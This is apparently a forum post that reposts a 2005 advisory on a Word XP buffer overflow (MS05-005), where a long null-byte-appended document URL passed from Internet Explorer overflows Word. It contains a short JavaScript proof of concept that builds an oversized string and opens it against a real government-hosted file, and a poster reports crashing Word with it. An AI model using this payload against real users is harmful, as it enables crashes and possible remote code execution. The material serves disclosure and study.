Help
Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005) 13 Feb. 2005
Summary
A new vulnerability in Microsoft Word XP allows an attacker to launch a buffer overflow attack. This attack could occur when a user opened a Word document using Internet Explorer.
Credit:
The information has been provided by Rafel Ivgi.
Details
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens that doc file. The problem appears when sending a doc file request that contains a null byte (parser) at the end of the doc filename (the rtf extension is also vulnerable).
For Example:
http://example.com/myfile.doc is a valid request.
However the following: http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc is an invalid request. Such a request will be sent to the server hosting the doc file.
Most servers like IIS and Apache will truncate the characters before the %00 while sending the filename to Internet Explorer. At this stage, Internet Explorer will hand over the string to Microsoft Word XP, which will now receive a long string. This string causes an exploitable buffer overflow, allowing remote code execution.
Proof of Concept Code:
<script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>
Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft released an advisory and patches to this vulnerability. For further details please refer to: Vulnerability in Microsoft Office XP could allow Remote Code Execution (MS05-005)taken from hxxp://www.securiteam.com
edit:
hmm dunno if this is the bof we want but i can crash winword.
have a look:
Attached File(s)
-
shot.JPG (168.33K)
Number of downloads: 70
MultiQuote
